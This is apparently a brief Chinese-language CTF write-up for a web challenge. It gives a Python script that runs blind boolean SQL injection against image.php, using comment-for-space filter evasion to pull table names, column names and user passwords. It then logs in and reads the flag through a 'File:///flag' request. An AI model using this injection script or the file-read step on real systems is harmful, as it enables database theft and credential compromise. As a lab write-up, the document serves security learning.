web3

image.php 有sql注入

```

import requests
import sys
session = requests.session()
hh=''
burp0_url = "http://eci-2zeab1jn4vnk23hzs0z3.cloudeci1.ichunqiu.com:80/image.php"
for i in range(1,100):
    for j in range(30,129):
        if j==128:
            sys.exit(1)

        #print(gg)
        params={'id':"2/(select/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctf'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(password)from users),{},1))={})".replace(' ','/**/').format(i,j)}

        r=session.get(burp0_url,params=params)
        a=len(r.text)
        if a>1000:
            hh+=chr(j)
            print(hh)
           break

 ```

得到密码登录

登录后

File:///flag 得到flag